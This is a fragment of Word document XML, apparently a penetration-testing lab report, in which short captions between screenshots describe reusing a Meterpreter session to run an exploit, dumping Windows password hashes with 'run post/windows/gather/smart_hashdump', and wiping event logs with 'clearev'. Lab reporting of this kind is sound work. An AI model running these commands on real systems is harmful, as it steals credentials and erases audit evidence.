        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B763087" wp14:editId="13BA0B75">
            <wp:extent cx="5731510" cy="838835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="146791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14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48EF" w14:textId="77777777" w:rsidR="008A21B8" w:rsidRDefault="008A21B8" w:rsidP="00126EAB"/>
    <w:p w14:paraId="67F77003" w14:textId="634F643E" w:rsidR="008A21B8" w:rsidRDefault="008A21B8" w:rsidP="00126EAB">
      <w:r w:rsidRPr="008A21B8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C5949B" wp14:editId="0CAEC5A6">
            <wp:extent cx="5731510" cy="3463290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="906961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6193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6232" w14:textId="77777777" w:rsidR="008A21B8" w:rsidRDefault="008A21B8" w:rsidP="00126EAB"/>
    <w:p w14:paraId="1C609BAA" w14:textId="63D0FB50" w:rsidR="008A21B8" w:rsidRDefault="008A21B8" w:rsidP="00126EAB">
      <w:r>
        <w:t>Setting the session to the previous meterpreter session and run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C56D64" w14:textId="5A6E418A" w:rsidR="008A21B8" w:rsidRDefault="00747B50" w:rsidP="00126EAB">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D53275" wp14:editId="6C5567A8">
            <wp:extent cx="5731510" cy="2023745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="129702220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22203" name="Picture 1" descr="A computer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DC59" w14:textId="77777777" w:rsidR="00165BF6" w:rsidRDefault="00165BF6" w:rsidP="00126EAB"/>
    <w:p w14:paraId="0C67A2AE" w14:textId="43FFA812" w:rsidR="00F53294" w:rsidRPr="00165BF6" w:rsidRDefault="00165BF6" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165BF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run post/windows/gather/smart_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F54D78" w14:textId="547C26D2" w:rsidR="00F53294" w:rsidRDefault="00B66445" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman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9EA174A" wp14:editId="3F28E690">
            <wp:extent cx="5731510" cy="2868930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="486162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6261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E245" w14:textId="77777777" w:rsidR="00165BF6" w:rsidRDefault="00165BF6" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114D1282" w14:textId="58E1CE08" w:rsidR="00165BF6" w:rsidRDefault="00C03B4F" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearing the event logs remotely using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>clearev.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36300244" w14:textId="5CFEBCD8" w:rsidR="00C03B4F" w:rsidRPr="00C03B4F" w:rsidRDefault="00B66445" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B66445">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339F9F22" wp14:editId="21F6DB42">
            <wp:extent cx="5731510" cy="1489710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15359876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7639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B4F" w:rsidRPr="00C03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2MDUwMjA1MDY1NzVX0lEKTi0uzszPAykwqQUAeXaVxSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00E83420"/>
    <w:rsid w:val="00016D79"/>
    <w:rsid w:val="00027EC7"/>
    <w:rsid w:val="000E544A"/>
    <w:rsid w:val="00126EAB"/>
    <w:rsid w:val="00165BF6"/>
    <w:rsid w:val="001A201A"/>
    <w:rsid w:val="00260B91"/>
    <w:rsid w:val="00263413"/>
    <w:rsid w:val="002E49B0"/>
    <w:rsid w:val="002F1902"/>
    <w:rsid w:val="002F5B57"/>
    <w:rsid w:val="003E43EB"/>
    <w:rsid w:val="004C13DD"/>
    <w:rsid w:val="00510C03"/>
    <w:rsid w:val="00554F9E"/>
    <w:rsid w:val="00586895"/>
    <w:rsid w:val="00596DB6"/>
    <w:rsid w:val="00656C58"/>
    <w:rsid w:val="00747B50"/>
    <w:rsid w:val="007A26BE"/>
    <w:rsid w:val="007D5705"/>
    <w:rsid w:val="008504C0"/>
    <w:rsid w:val="008A21B8"/>
    <w:rsid w:val="008E2833"/>
    <w:rsid w:val="0097471C"/>
    <w:rsid w:val="009B1646"/>
    <w:rsid w:val="00A56887"/>
    <w:rsid w:val="00A62AF5"/>
    <w:rsid w:val="00AA302C"/>
    <w:rsid w:val="00B16FBE"/>
    <w:rsid w:val="00B31940"/>
    <w:rsid w:val="00B63643"/>
    <w:rsid w:val="00B66445"/>
    <w:rsid w:val="00B8547C"/>
    <w:rsid w:val="00BF7B2C"/>
    <w:rsid w:val="00C03B4F"/>
    <w:rsid w:val="00CE6BFC"/>
    <w:rsid w:val="00E059BC"/>
    <w:rsid w:val="00E83420"/>
    <w:rsid w:val="00F03B23"/>
    <w:rsid w:val="00F53294"/>
    <w:rsid w:val="00F622C5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0F14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{66C53417-D15D-49D1-9F70-FE479DEB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F9E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20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20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20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20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20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20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20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E8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20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342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54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47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9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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-07T18:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-18T05:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>